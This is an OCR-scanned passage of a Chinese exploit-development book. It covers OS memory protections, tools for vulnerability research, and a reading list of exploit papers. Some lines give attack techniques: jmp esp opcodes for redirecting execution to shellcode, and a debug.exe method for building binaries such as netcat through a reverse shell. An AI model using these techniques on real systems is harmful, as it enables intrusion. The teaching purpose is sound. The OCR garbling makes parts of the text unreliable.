太 可 能 恶化 相 邻 块 里 的 敏感 数据 。 

a A Fragesize/2 (在 Intel x86 上 是 2048) TRA PUE REIL L 例如 , 在 Intelx86 


5. 其 他 的 Open BSD 实 现 
a 在 3.4 版 本 以 后 ， 用 ProPolice 编 译 内 核 。 
口 在 某 些 平台 上 ， 某 些 类 型 的 W^X 在 内 核 上 是 可 用 的 。 
14.2.4 MacOSX 
就 保护 机 人 制 来 说 ，PowerPC 和 了 intel 处理 器 上 的 Mac OS 之 间 只 有 很 小 的 差别 ， 甚 至 连 一 些 地 址 
都 是 一 样 的 。 
1. WAX 
口 在 Intel x86 上 ， 只 有 栈 被 标记 成 不 可 执行 ， 其 余 的 都 是 可 执行 的 。 
口 在 Power PC 上 ， 所 有 的 都 被 标 为 可 执行 的 。 
2. ASLR 
口 没有 东西 被 随机 化 。 
a 在 两 个 平台 之 间 ， 除 了 各 自 平台 代码 所 引入 的 明显 差异 外 ， 甚 至 大 多 数 地 址 都 是 一 样 的 
(或 类 似 的 )。 
a 一 些 节 ， 特 别 是 堆 和 主 二 进 制 ， 都 在 AAAS 里 。 
3. 栈 数据 保护 
a 没有 。 在 Mac OS XX 二进制 里 不 存在 canary 或 重新 排序 。 
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4. 堆 保护 
O 没有 。 不 存在 安全 取消 链接 检验 或 堆 canary。 
口 堆 数 据 块 经 常 是 一 块 接着 一 块 分 配 的 ， 中 间 没 有 插入 堆 管 理 结构 ， 因 此 ， 有 可 能 会 游 出 
敏感 信息 。 可 以 证 明 ， 这 将 使 特殊 的 应 用 程序 堆 滋 出 利用 更 容易 一 些 。 另 一 方面 ， 它 也 
使 普通 的 OS X 堆 溢出 技术 更 难 一 些 。 
5. 其 他 的 Mac OS X 实 现 
攻击 Mac OS X 时 要 牢记 ， 目 标 可 能 运行 在 Intel 或 PowerPC 处 理 器 上 ， 你 应 该 确保 破解 程序 在 
两 个 平台 上 都 可 以 工作 。 这 可 以 通过 构造 多 平台 代码 或 利用 破解 参数 里 的 差异 实现 ( 像 栈 溢出 里 ， 
到 返回 地 址 的 距离 )， 就 像 第 12 章 介绍 的 。 


14.2.5 Solaris 

Solaris 曾 经 是 最 先进 的 采用 nx-stack 的 操作 系统 ， 但 如 今 ， 它 只 是 本 章 讨论 的 一 种 保护 机 制 ， 
我 们 期 待 在 将 来 看 到 更 多 的 ， 特 别 是 来 自 OpenSolaris 安 全 小 组 (http://www.opensolaris.org/os/ 
community/security/projects/privdebug/) 的 成 果 ， 但 遗憾 的 是 ， 直 到 现在 还 没有 线索 。 

1. WAX 

O 在 Intel x86 和 硬件 上 ，Solaris 10 根 本 不 支持 W^X。 

a 在 SPARC 硬 件 上 ， 可 以 创建 不 可 执行 页 。 

a 32 位 的 suid 应 用 程序 默认 启用 nx-stack， 但 其 他 的 32 位 应 用 程序 都 禁用 了 。 可 以 通过 修改 

/etc/system 文 件 全 局 启用 它 。 

Qa 64 位 应 用 程序 默认 启用 nx-stack。 

O 所 有 应 用 程序 的 节 都 被 映射 成 W+X。 

a 原先 标 为 W^AX 的 节 可 以 用 mprotect () 改 成 W+X。 

Q chained ret2code 很 可 能 会 成 功 ， 就 像 John McDonald 演 示 的 那样 http://marc.info?m= 

92047779607046). 

2. ASLR 

O 根本 没有 地 址 被 随机 化 。 

a 库 被 加 载 到 AAAS 之 外 的 高 端 地 址 。 

O 主 应 用 程序 映像 和 堆 被 映射 到 AAAS 之 内 。 

3. 栈 数 据 保 护 

n 没有 。 在 Solaris 二 进 制 里 ， 不 存在 canary 或 重新 排序 栈 内 容 。 

4. 堆 保护 

a 没有 。 一 直到 版 本 10，Solaris 堆 例 程 里 都 不 存在 安全 取消 链接 或 cookie 检 验 。 

5. 其 他 的 Solaris 实 现 

Solaris 10 开 始 , 引入 了 一 些 可 用 于 加 固 Solaris 系 统 的 安全 特性 。 它 们 涉及 沙 箱 (sandboxing) 
和 有 限 性 能 : 进程 权限 管理 (Process Rights Management) 和 RBAC, 可 信 扩 展 (Trusted Extensions) 
和 MAC， 以 及 令 人 难以 置信 的 DTrace 工 具 。DTrace 算 不 上 最 好 的 调试 工具 ， 但 是 可 以 用 它 限制 
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一 个 或 一 组 给 定 进程 的 能 
14.3 小 结 


本 章 介绍 了 使 破解 程序 作者 的 生活 变 得 更 有 趣 、 也 更 复杂 的 多 种 保护 机 制 。 这 些 保护 机 制 都 
有 弱点 ， 这 里 也 显示 了 利用 这 些 弱 点 足以 在 受 保护 的 系统 上 执行 代码 。 然 而 ， 当 把 这 些 保护 机 制 
结合 起 来 使 用 时 ， 可 以 提供 比 单纯 相 加 多 得 多 的 保护 。 

只 要 保护 机 制 继续 跟着 特殊 利用 技术 的 脚步 , 那么 它们 将 永远 落后 于 技术 发 展 水 平 ,攻击 者 
总 会 有 找 出 攻击 它们 的 机 会 。 微 软 的 SEH 保 护 时 间 线 就 是 一 个 非常 好 的 佐证 ， 破 解 程序 滥用 寄存 
AFDE (trampoline) 到 代码 ， 微 软 把 所 有 的 寄存 器 置 零 ， 因此 ， 破 解 程序 开始 直接 跳 到 栈 上 ， 但 
栈 被 微软 禁用 了 ， 因 此 ， 破 解 程序 开始 用 pop-pop-ret 作 为 跳 床 ， 微 软 执行 /SafeSEH; 利用 程序 
仍 行 得 通 ， 但 需要 新 技术 了 。 随 着 Windows Vista 的 传 入 ， 微 软 改 变 了 /SafeSEH 的 实现 ， 但 破解 程 
序 仍 幸 免 于 难 《有 了 时候 ， 他 们 做 起 来 甚至 比 以 前 更 容易 )。 

另 一 方面 ， 经 过 慎重 考虑 后 设计 的 保护 机 制 ， 像 W^X 和 ASLR〔 从 理论 上 可 以 阻挡 外 来 代 
码 注入 和 代码 重用 )， 又 涉及 实现 细节 的 竞争 优先 权 、 向 后 兼容 性 、 标 准 和 性 能 下 降 ， 到 目前 为 
止 ， 谁 将 最 终 赢得 胜利 尚 不 得 而 知 。 

这 场 竞赛 还 涉及 经 济 因 素 , 可 用 的 bug 和 对 应 的 破解 程序 的 官 市 、 黑 市 、 灰 市 当前 都 在 增长 。 
政府 、 犯罪 分 子 以 及 大 公司 正在 提高 破解 程序 和 可 利用 的 漏洞 的 收购 价 ， 为 这 个 市 场 注 入 大 量 资 
金 ， 使 这 个 市 场 的 需求 量 更 大 并 更 加 政治 化 。 在 这 样 的 环境 下 ， 破 解 程序 作者 被 保护 机 制 、 用 户 
期 望 及 强力 政治 所 挑战 ， 被 强迫 去 学 习 、 研 究 新 的 利用 技术 ， 也 变 得 更 专业 和 严肃 ， 他 们 创作 大 
量 的 黑客 手册 ,但 也 私自 保留 了 很 多 高 级 技巧 ， 而 不 愿 公开 讨论 。 对 学 习 能 力 的 要 求 变 得 比 以 前 
更 严格 了 ， 起 点 也 更 高 了 ， 同 时 这 个 领域 内 “未 公开 的 ”知识 正 日 益 丰富 。 

本 书 将 继续 介绍 二 进 制 应 用 程序 以 及 一 些 可 利用 的 漏洞 和 利用 程序 〈 前 者 依赖 于 后 者 而 存 
在 )， 当 它们 变 得 稀有 时 ， 它 们 的 价格 将 继续 上 扬 ， 能 迎接 这 些 挑战 的 破解 程序 作者 也 会 更 少 。 
闻 时 ， 你 也 会 看 到 越 来 越 多 的 攻击 转 到 较 少 保护 的 区 域 了 ， 比 如 ， 其 他 的 操作 系统 、 内 核 漏洞 、 
嵌入 式 设备 、 家 用 电器 、 硬 件 及 Web 应 用 程序 等 。 这 个 趋势 的 终点 在 哪里 一 直 饱 受 争 议 ， 尽 管 笔 
者 认为 真正 解决 任意 代码 漏洞 的 问题 是 不 太 可 能 的 。 

记 住 本 章 的 内 容 , 用 基于 栈 的 缓冲 区 溢出 漏洞 作为 第 一 个 练习 来 学 习 破解 程序 开发 似乎 很 范 
雇 ， 但 我 们 没有 其 他 选择 ， 因 为 这 是 学 习 的 起 点 。 为 了 完全 理解 利用 技术 的 发 展 水 平 ， 我 们 现在 
要 花 更 多 的 精力 ， 但 仍 有 许多 漏洞 等 待 我们 发 现 。 抓 紧 缉 绳 ， 享 受 飞 马 疾驰 的 感觉 吧 。 








ESZA 
漏洞 发 现 





现在 ， 你 已 经 是 Linux、Windows、Saolaris、0OS X、Cisco 方 面 的 专业 黑客 了 。 在 第 三 部 分 
里 ， 我 们 集中 精 为 按 据 漏洞 ， 并 将 介绍 当今 最 流行 的 发 据 漏 洞 的 方法 。 在 开始 之 前 ， 我 们 首先 
要 做 的 是 搭建 工作 环境 ， 以 便 把 方方面面 结合 起 来 开展 发 握 漏 洞 的 工作 。 第 15 章 介绍 高 效 寻 找 
漏洞 所 需要 的 工具 和 参考 资料 。 第 16 章 介绍 一 个 流行 的 自动 漏洞 发 掘 方法 一 一 故障 注入 。 第 17 
章 详细 介绍 一 个 和 自动 错误 发 现 类 似 的 方法 一 一 模糊 测试 。 

其 他 的 漏洞 发 据 方 法 和 模糊 测试 同样 有 效 ， 因 此 ， 我 们 对 这 些 方 法 也 做 了 介绍 。 由 于 越 来 
越 多 的 重要 应 用 程序 带 有 源码 ， 通 过 审计 源码 来 发 现 漏洞 就 变 得 重要 了 ;， 第 18 章 描述 子 有 源码 
时 怎样 寻找 漏洞 。 手 动 寻 找 漏洞 有 较 高 的 成 功率 ， 因 此 ， 在 第 19 章 ， 我 们 转向 手动 调查 ， 用 一 
些 已 经 被 证 明 工 作 良 好 的 方法 ， 和 手动 寻找 安全 错误 。 第 20 章 介绍 漏洞 跟踪 ， 这 是 一 个 通过 不 同 
的 函数 、 模 块 和 函数 库 复制 输入 数据 的 跟踪 方法 。 第 21 章 介绍 二 进 制 审 计 ， 全 面 介 绍 只 有 二 进 
制 码 时 怎样 发 现 漏洞 。 . 


本 ,部 分 内， 
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二 进 制 审计 ， 痢 析 不 公开 源码 的 软件 
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TUA ich RORIS RUE. ok AE 
当然 了 ， 我 的 意思 不 是 指 在 昏暗 的 房间 里 ， 桌 上 摆 满 了 食品 和 饮料 ， 而 是 指 拥 有 那些 
优秀 的 编程 工具 、 调 试 分 析 工 具 以 及 参考 资料 等 。 合理 地 使 用 它们 ， 将 会 事半功倍 。 本 章 将 介绍 
如 何 着 手 创建 这 样 的 工作 环境 。 

通常 来 说 ， 如 果 你 打算 研究 漏洞 ， 至 少 需要 具备 两 个 条 件 : 一 是 要 有 目标 系统 的 参考 资料 和 
手册 ， 二 是 要 有 编写 攻击 代码 的 工具 ， 调 试 分 析 工 具 〈 用 于 在 试验 过 程 中 ， 密 切 观 察 系 统 的 运行 
状况 ) 也 非常 有 用 。 因 此 ， 本 章 将 首先 简单 介绍 这 三 个 方面 的 最 新 内 容 。 当 然 ， 在 shellcode 领 域 
里 ， 每 天 都 可 能 会 出 现 新 的 技术 ， 因 此 本 书 呈 现在 读者 面前 时 ， 讨 论 的 内 容 可 能 已 经 不 是 最 新 的 
了 2， 但 我 们 可 以 保证 书 中 提 到 的 编程 工具 、 调 试 分 析 工 具 、 参 考 资料 等 ， 在 写 这 本 书 的 时 候 都 
是 最 新 的 。 

和 其 他 章节 一 样 , 我 们 不 偏 祖 任何 操作 系统 , 所 以 下 面 列 出 的 内 容 可 能 和 你 正在 使 用 的 系统 
无 关 ， 那 么 就 权 且 当 作 参考 吧 。 如 果 所 介绍 的 内 容 与 操作 系统 相关 ， 我 们 将 把 操作 系统 列 出 来 ， 
如 果 没 有 列 出， 那么 这 些 内 容 要 么 是 与 平台 无 关 的 ， 要 么 是 各 个 操作 系统 的 共性 问题 。 


15.1 需要 什么 样 的 参考 资料 


首先 ， 需 要 阅读 计算 机 硬件 体系 的 汇编 参考 资料 : 
O Intel x86 
Q Intel Architecture Software Developer's Manual, Volume 2:Instruction Set Reference 
http://www. intel.com/design/mobile/manuals/243191.htm 
或 者 在 因特网 上 搜索 24319101.pdf — 
D x86 Assembly Language FAQ 
http://www.faqs.org/faqs/assembly-language/x86/ 
a IA64 参 考 资料 (tanium) 
www.intel.com/design/itanium/manuals/iiasdmanual.htm 
Q SPARC Assembly Language Reference Manual 





(D 安全 技术 每 天 更 新 ， 而 书籍 一 旦 出 版 就 不 更 新 了 ， 除 非 再 版 。 一 一 译 者 注 
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http://docs.sun.com/db/doc/816-1681 
或 者 在 因特网 上 搜索 816-1681.pdf 
OQ SPARC Architecture Online Reference Manual 
http://online.mq.edu.au/pub/COMP226/sparc-manual/index.html 
n PA/RISC 参 考 手 册 CHP) 
在 惠普 公司 网 站 上 搜索 References and Manuals 
口 http://lsd-pl.net/ 收 集 了 一 些 非常 好 的 参考 资料 


15.2 ”用 什么 编程 
编写 攻击 代码 需要 使 用 工具 ， 下 面 将 介绍 编写 x86 shellcode 时 经 常会 用 到 的 工具 。 


15.2.1 gcc 

gcc (GNU Compiler Collection》 是 一 个 被 广泛 使 用 的 C/C++ 编译 器 ， 它 的 发 行 版 还 支持 
Fortran、Java、Ada 等 编程 语言 。gcc 可 能 是 目前 最 好 的 免费 (GPL) 编译 器 ， 支 持 内 联 汇编 。 对 
shellcode 开 发 者 来 说 ，gcc 是 最 好 的 选择 之 一 。 

gcc 主 页 是 : http://gec.gnu.org/. 
15.2.2 gdb 

gdb (GNU Debugger) 是 一 个 免费 (GPL》 的 调试 器 ， 提 供 命令 行 调试 界面 ， 它 与 gcc 集 成 
得 很 好 , 对 交互 式 的 反 汇 编 支持 也 很 好 ,所 以 对 于 查找 洲 出 、 格式 化 囊 漏洞 来 说 , 它 是 不 二 之 选 。 

可 以 在 http://www.gnu.org/software/gdb/ 网 址 上 找到 GDB。 
15.2.3 NASM 

NASM (Netwide Assembler) 是 免费 的 x86 汇 编 器 , 可 以 生成 多 种 格式 的 二 进 制 文件 。 如 Linux 
和 BSD 的 a.out、ELF、COFF、Windows 的 16 位 和 32 位 目标 文件 和 可 执行 文件 。 

如 果 你 正在 寻找 专业 的 汇编 程序 ， 那 NASM 毫 无 疑问 是 个 不 错 的 选择 。 它 所 附带 的 文档 还 详 
细 介 绍 了 x86 的 操作 码 。 

可 以 在 http:/sourceforge.net/projectsmnasm 网 址 上 找到 NASM。 
15.2.4 WinDbg 

WinDbg 是 微软 向 客户 单独 提供 的 调试 器 ， 有 友好 的 GUI 界面 及 大 量 出 色 的 特性 ， 如 内 存 搜索 、 
调试 子 进程 、 增 强 的 异常 处 理 能 力 等 。 因 为 WinDbg 能 自动 跟随 并 附 上 派生 的 子 进程 ， 所 以 ， 如 果 
你 准备 为 使 用 子 进程 的 程序 〈 例 如 Oracle 或 Apache) 编写 漏洞 破解 程序 ，WinDbg 将 非常 有 帮助 。 

可 以 在 http://www.microsoft.com/whdc/devtools/debugging/ 网 址 上 找到 WinDbg, 或 者 在 因特网 
上 搜索 Debugging tools for Windows。 


15.2.5 OllyDbg 
OllyDbg 是 Windows 平 台 下 的 “分 析 调 试 器 ” 有 非常 突出 的 特性 ， 如 全 内 存 搜索 (WinDbg 
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缺少 这 个 功能 ) 等 。 它 的 反 汇 编 功 能 也 很 强大 。 甚 至 可 以 说 OllyDbg 是 集 WinDbg 和 IDA 的 优点 于 
一 身 的 优秀 工具 。 

可 以 在 http:/www.ollydbg.de/ 网 址 找到 OllyDbg。 
15.2.6 Visual C++ 

Visual C++ 是 微软 推出 的 C/C++ 编译 器 中 的 旗舰 产品 ， 用 户 界面 非常 友好 ， 内 和 置 强 大 的 调试 
功能 。Visual C++ 另 一 个 突出 的 优势 是 它 无 颖 集成 了 Microsoft Developer Network (MSDN) 文档 
集 ， 这 在 编写 Windows 攻 击 代码 时 非常 有 用 ; 把 Win32 API 参 考 资 料 集成 到 IDE， 可 以 加 快 编写 代 
码 的 速度 。Visual C++ 和 GCC 类 似 ， 也 支持 内 联 汇编 ， 这 将 简化 编写 攻击 代码 的 过 程 。 总 而 言 之 ， 
如 果 你 有 Visual C++ 的 访问 许可 证 ， 那 么 Visual C+HDeveloper Studio 是 值得 一 试 的 。 


15.2.7 Python 

Python 是 众所周知 的 快速 应 用 程序 开发 语言 。 最 近 比 较 流 行 用 Python 写 攻 击 代码 ， 如 本 书 的 
两 位 作者 ， 他 们 用 Python 可 以 非常 迅速 地 编写 出 攻击 代码 ， 从 而 获得 竞争 上 的 优势 。Python 加 上 
MOSDEF 〈 一 个 纯 Python 汇 编 器 和 shellcode 开 发 工具 ) 将 是 你 武器 库 中 最 棒 的 组 合 之 一 。 


15.3 ”研究 时 需要 什么 


为 了 发 现 bug， 我 们 还 需要 仔细 计划 怎样 研究 目标 系统 或 程序 的 内 部 结构 。 下 面 的 工具 在 很 
多 场合 都 能 派 上 用 场 ， 例 如 在 寻找 bug、 开 发 破解 程序 、 分 析 他 人 的 破解 代码 时 ， 都 会 有 所 帮助 。 


15.3.1 有 用 的 定制 脚本 /工具 

除了 本 章 所 列 的 工具 之 外 ， 作 者 还 使 用 一 些 定制 的 、 短 小 精 悍 的 工具 。 当 然 ， 也 可 以 自己 动 
手写 一 些 脚 本 或 小 程序 来 达到 同样 的 目的 。 

1. 偏 移 地 址 查找 器 

在 Windows 和 UNIX 平 台 上 ， 可 能 要 经 常 寻 找 某 条 指令 的 地 址 。 比 如 说 ， 在 利用 Windows 栈 
溢出 的 过 程 中 ， 你 可 能 想 查找 指向 shellcode 的 ESP 寄 存 器 。 为 了 利用 这 个 漏洞 ， 需 要 寻找 某 段 指 
令 的 地 址 , 以 便 把 程序 流程 重 定向 到 你 的 代码 。 最 简单 的 实现 方法 是 在 内 存 里 寻找 如 下 字 节 序 列 ， 


然后 用 它 的 地 址 改写 函数 的 返回 地 址 : 

jmp esp (Oxff Oxe4) 

call esp (Oxff Oxd4) 

push esp; ret {0x54 Oxc3) 

你 可 能 会 发 现在 内 存 里 的 很 多 地 方 都 有 这 样 的 序列 ， 但 理想 的 情况 是 在 疫 被 Service Pack 修 
改 的 DLL 里 找到 它们 。 


偏 移 地 址 查找 器 的 工作 原理 是 关联 远程 进程 , 挂 起 进程 中 的 所 有 线程 ， 然 后 在 内 存 中 寻找 指 
定 的 字 节 序列 ， 并 把 搜索 结果 输出 到 文本 文件 里 。 偏 移 地 址 查找 器 虽然 简单 ， 但 很 实用 。 作 为 另 
一 种 选择 ，Metasploit 项 目 在 http://www.metasploit.com/opcode_database.html 网 页 上 提供 了 一 个 在 


线 的 操作 码 数 据 库 。 
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2. 普通 的 模糊 测试 方法 

研究 某 个 软件 〈 产 品 ) 的 安全 漏洞 时 会 发 现 ， 写 一 个 关注 产品 (Web 接口 、 定 制 的 网 络 协议 ， 
甚至 RPC 接 口 ) 特性 的 模糊 测试 方法 非常 有 帮助 。 但 普通 的 模糊 测试 方法 也 很 有 用 ， 即 使 是 很 简 
单 的 模糊 测试 方法 也 可 以 帮 我 们 做 很 多 事 。 

3. 调试 技巧 

大 家 都 知道 Windows 下 的 反 向 shell 有 很 多 问题 。 比 如 说 ， 它 不 支持 上 传 二 进 制 文件 ， 连 最 基 
本 的 脚本 也 受到 限制 .不 过 , 在 这 黑暗 的 可 怕 世 界 里 还 是 有 一 丝 希 望 的 , 那 就 是 “古老 的 "MS-DOS 
调试 器 debug .exe。 

debug.exe 自 MS-DOS 时 代 出 现 至 今 ， 依 然 顽 强 地 存在 于 几乎 每 一 个 Windows 版 本 中 ， 在 每 
台 装 有 Windows 的 机 器 里 几乎 都 能 找到 它 。 尽 管 在 设计 之 初 ， 程 序 员 是 打算 用 debug .exe 调试 和 
创建 .com 文 件 的 ， 但 实际 上 ， 你 可 以 用 它 创建 任意 的 二 进 制 文件 。 当 然 , 还 是 有 一 些 限制 的 ， 比 
如 说 文件 必须 小 于 64KB， 文 件 名 不 能 以 .exe 或 .com 结 尾 等 。 

例如 ， 某 文件 内 容 如 下 : 


73 71 75 65 61 6D 69 73 68 20 6F 73 73 69 66 72 squeamish ossifr 
61 67 65 OA DE CO DE DE CO DE DE CO DE age. @@pAG@p@@pAGep@e@pAGep 


你 可 以 写 一 个 脚本 文件 输出 上 述 的 二 进 制 文件 ， 如 下 所 示 《 把 文件 命名 为 foo.scr): 


n foo.scr 

e 0000 73 71 75 65 61 6d 69 73 68 20 6£ 73 73 69 66 72 
e 0010 61 67 65 Od 0a de c0 de de c0 de de c0 de 

rcx 

le 

w 0 

q 


然后 运行 debug .exe。 

debug < foo.scr 

debug .exe 输 出 一 个 二 进 制 文件 。 

真相 大 白 ! 因为 这 样 的 脚本 文件 只 包含 字母 、 数 字 ， 因 此 可 以 在 反 向 shell 里 用 echo 命 令 创建 
脚本 。 等 远程 计算 机 编辑 完 脚 本 文件 后 ， 可 以 按 上 面 介 绍 的 步骤 运行 debug .exe， 即 可 生成 二 进 
制 文件 。 当 然 ， 也 可 以 按 自己 的 喜好 命名 文件 ， 如 nc. fco， 待 处 理 完成 后 再 改 成 nc .exe。 

创建 脚本 文件 是 唯一 可 以 自动 化 的 事情 ， 使 用 Perl、Python 或 C 即 可 轻松 完成 。 在 整个 过 程 
中 , 唯一 需要 动手 的 地 方 就 是 创建 脚本 文件 。 如 果 你 坚持 使 用 Windows 中 的 反 向 shell, debug . exe 
将 是 必 备 的 工具 。 

在 Windows 上 还 有 其 他 上 传 二 进 制 文件 的 方法 ， 例 如 ， 先 生成 完全 由 可 打印 字符 组 成 的 .com 
文件 ， 然 后 由 它 生成 任意 的 二 进 制 文件 。 你 可 以 把 可 打印 的 字符 复制 到 .com 文 件 里 ， 然 后 调用 它 
生成 目标 文件 。 


15.3.2 ”所 有 的 平台 
NetCat 可 能 是 如 今 最 简单 的 、 被 广泛 使 用 的 跨 平 台 网 络 安全 工具 。 它 的 原作 者 Hobbit 把 它 描 
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述 为 “TCP/IP 瑞 士 军刀 ”。 比如 说 ， 你 可 以 用 它 在 TCP/UDP 端 口上 收发 二 进 制 文件 ， 也 可 以 监听 
反 向 shell。NetCat 最 早出 现在 Linux 平 台 上 ， 后 来 有 了 Windows 版 本 ， 现 在 又 有 了 GNU 版 版 本 。 
GNU 版 的 NetCat 可 以 在 http://netcat.sourceforge.net/ 网 址 上 找到 。 

Netcat 最 早 的 UNIX 和 Windows 版 本 由 Hobbit 和 Chris Wysopal (Weld Pond) 编写 ， 可 以 在 
http://www.vulnwatch.org/netcat/ 网 址 上 找到 。 


15.3.3 UNIX 

通常 来 说 ，UNIX 的 工作 环境 要 比 Windows 的 好 一 些 ， 它 有 很 多 实用 的 小 工具 ， 因 此 在 菜 些 
时 候 ，UNIX 漏 洞 挖掘 者 的 日 子 要 好 过 一 些 。 

1. ltrace 和 strace 

ltrace 和 strace 允 许 查 看 系统 的 动态 函数 库 调用 、 程 序 生 成 的 系统 调用 、 程 序 接收 的 信号 等 内 
容 。 如 果 你 想 了 解 进程 处 理 字符 串 的 详细 过 程 ，ltrace 将 非常 有 用 ; 如 果 你 想 规避 主机 IDS 的 检测 ， 
或 解决 程序 的 系统 调用 问题 ，strace 也 非常 有 用 。 

更 多 信息 请 查看 ltrace 和 strace 的 操作 手册 。 

2. truss 

在 Solaris 上 ，truss 提 供 的 功能 类 似 于 ltrace 与 strace 的 组 合 。 

3. fstat (BSD) 

fstat 是 基于 BSD 的 实用 程序 ， 可 以 识别 已 打开 的 文件 (包括 套 接 字 )。 如 果 你 想 在 纷 杂 的 环 
境 中 快速 找 出 某 个 进程 正在 做 什么 ， 它 可 以 派 上 用 场 。 

4. tcpdump 

最 好 的 漏洞 是 远程 漏洞 ， 因 此 sniffer 是 漏洞 控 据 者 必 备 工具 之 一 。tcpdump 可 以 快速 查看 监 
听 端 品 的 程序 正在 做 什么 ， 但 要 想 进一步 分 析 数 据 的 话 ，wireshark 〈 接 下 来 讨论 ) 更 适合 一 些 。 

5. wireshark 〈 前 身 是 ethereal) 

wireshark 是 图 形 界面 的 、 免 费 的 网 络 sniffer 和 协议 分 析 器 , 可 以 分 析 绝 大 多 数 类 型 的 数据 包 。 
如 果 你 想 了 解 不 常见 的 网 络 协议 或 打算 自己 写 协议 模糊 测试 方法 ， 它 将 是 最 佳 的 搭档 。 

可 以 在 www.wireshark.org/ 下 载 wireshark。 


15.3.4 Windows 

Windows 漏 洞 挖掘 者 的 生活 远 没 有 UNIX 的 那么 丰富 多 彩 ， 但 令 人 欣慰 的 是 ， 情 况 正 在 慢 慢 
好 转 , 各 种 各 样 的 工具 正在 不 断 涌现 。 下 面 介绍 的 几 个 工具 都 非常 有 用 , 可 以 在 Mark Russinovich 
和 Bryce Cogswell 的 网 站 上 找到 它们 , 这 个 网 站 现在 已 经 被 微软 收购 了 : http://www.microsoft.com/ 
technet/sysinternals/default.mspx. 

a RegMon: 监控 其 他 进程 对 Windows 注 册 表 的 访问 ， 带 有 过 滤器 ， 可 以 帮助 过 滤 无 关 信 息 ， 

把 精力 放 在 关注 的 进程 上 。 
a FileMon: 监控 文件 活动 ， 带 有 过 滤器 。 
O HandleEx: 查看 进程 加 载 了 哪些 DLL， 查 看 所 有 已 打开 的 句柄 ， 如 命名 管道 、 共 享 内 存 
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段 、 文 件 等 。 

a TCPView: 把 TCP/UDP 端 口 和 进程 关联 起 来 。 

Q Process Explorer: 人 允许 实时 检查 进程 、 句 柄 、DLL 等 。 

Sysinternals 的 网 站 提供 了 许多 好 工具 , 但 这 5 个 程序 是 一 个 好 的 工具 包 中 必 不 可 少 的 一 部 分 。 

IDA Pro 反 汇编 器 

IDA Pro 是 市 面 上 最 好 的 逆向 工程 、 反 汇编 工具 ， 拥 有 杰出 的 功能 ， 如 支持 编程 接口 、 交 互 
式 的 用 户 界面 、 方 便 的 交叉 引用 和 搜索 等 。 如 果 你 想 确 认 漏洞 代码 的 行为 ， 如 持续 运行 、 套 接 字 
挪用 等 ，IDA Pro 都 能 派 上 用 场 。 可 以 在 www.datarescue.com/ 找 到 IDA Pro 的 试用 版 。 


15.4 ”需要 学 习 的 资料 


在 互联 网 上 ， 我 们 可 以 找到 大 量 有 关 栈 溢出 的 资料 ， 相 比 之 下 ， 格 式 化 串 的 资料 就 少 多 了 ， 
堆 溢出 的 就 更 少 了 。 如 果 你 准备 研究 的 漏洞 不 在 上 述 之 列 ， 那 在 收集 资料 时 ， 你 可 能 会 碰 到 一 些 
麻烦 ， 但 愿 本 书 能 填补 一 些 这 方面 的 空白 。 如 果 你 想 查 阅 某 类 漏洞 的 资料 ， 下 面 列 出 的 清单 可 能 
会 有 所 帮助 。 在 下 面 的 分 类 里 ， 我 们 谨慎 地 列 了 一 些 我 们 认为 有 参考 价值 的 资料 。 
记 住 , 研究 前 人 开发 的 攻击 代码 和 阅读 参考 资料 具有 同等 的 价值 , 通常 代码 的 注释 和 头 文件 
都 会 详 述 相关 的 技术 ， 这 应 当 是 初学 者 感 兴趣 的 。 
为 了 节省 篇 幅 ， 我 们 不 得 不 省 略 了 很 多 精彩 的 内 容 。 如 果 你 要 找 的 资料 不 在 下 面 的 清单 里 ， 
请 见谅 。 
1. 栈 溢出 基础 
Q “Smashing the Stack for Fun and Profit” (Aleph One) 
Phrack Magazine, #34939, 381475 
http://www.phrack.org/archives/49/P49-14 
O Exploiting Windows NT4 Buffer Overruns (David Litchfield) 
www.ngssoftware.com/papers/ntbufferoverflow.html 
O “Win32 Buffer Overflows: Location, Exploitation and Prevention” 
(dark spyrit, Barnaby Jack, dspyrit@beavuh.org) 
Phrack Magazine, 585534, 381558 
http://www.phrack.org/archives/55/P55-15 
Q The Art of Writing Shellcode (Smiler) 
http://julianor.tripod.com/art-shellcode.txt 
Q The Tao of Windows Buffer Overfolw (DilDog) 
www.cultdeadcow.com/cDc files/cDc-351 
OQ UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes (LSD-PL) 
http://Isd-pl.net/projects/asmcodes.zip 
2. 高 级 栈 溢出 
Q Using Environment for Returning into Lib C (Lupin Bursztein) 




















www.shellcode.com.ar/docz/bof/rilc.html (Lupin’s 主页 是 www.bursztein.net) 
Non-Stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT/2000/XP 
(David Litchfield) 
www.ngssoftware.com/papers/non-stack-bo-windows.pdf 
Bypassing Stackguard and StackShield Protection (Gerardo Richarte ) 
www.coresecurity.com/common/showdoc.php?idx=242&idxseccion=11 
Vivisection of an Exploit Development Process (Dave Aitel) 
Blackhat Briefings Presentation, Amsterdam 2003 
www.blackhat.com/presentations/bh-europe-03/bh-europe-03-aitel.pdf 
. 堆 溢出 基础 
w00w00 on Heap Overflows (Matt Conover) 
www.w00w00.org/files/articles/heaptut.txt 
“Once upon a free()” 
Phrack Magazine, #5734, 38958 
http://www.phrack.org/archives/57/p57-0x09 
* Vudo— An object superstitiously believed to embody magical powers” (Michel MaXX 
Kaempf, maxx@synnergy.net) 
Phrack Magazine, #5738, 385858 
http://www.phrack. org/archives/57/p57-0x08 
. 整数 溢出 基础 
“Basic Integer Overflows” (blexim) 
Phrack Magazine, $8603]. 381098 
http://www.phrack. org/archives/60/p60-0x0a.txt 
. 格式 化 串 基础 
Format String Attacks (Tim Newsham) 
http://community.corest.com/~juliano/tn-usfs.pdf 
Exploiting Format String Vulnerabilities (scut) 
http://julianor.tripod.com/teso-fs1-1.pdf 
“Advances in Format String Exploitation" (Gera,Riq) 
Phrack Magazine, 93593), %77 
http://www.phrack.org/archives/59/p59-0x07.txt 
. 译 码 器 和 它 的 替代 者 
“Writing ia32 Alphanumeric Shellcodes" (rix) 
Phrack Magazine, 33571], %15 
http://www.phrack.org/archives/57/p57-0x18 
Creating Arbitrary Shellcode in Unicode Expanded Strings (Chris Anley) 
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www.ngssoftware.com/papers/unicodebo.pdf 

7. 跟踪 、 调 试 和 记录 

O VTrace 工 具 : 为 Windows NT 和 Windows 2000 创 建 系统 跟踪 器 
“VTrace” 系 统 跟踪 工具 〈 阐 述 论 文 ) 
http://msdn.microsoft.com/msdnmag/issues/1000/VTrace/ 

Q “Interception of Win32 API Calls”( 微 软 研 究 论 文 ) 
www.research.microsoft.com/sn/detours/ 

Q “Writing [a] Linux Kernel Keylogger” (rd) 
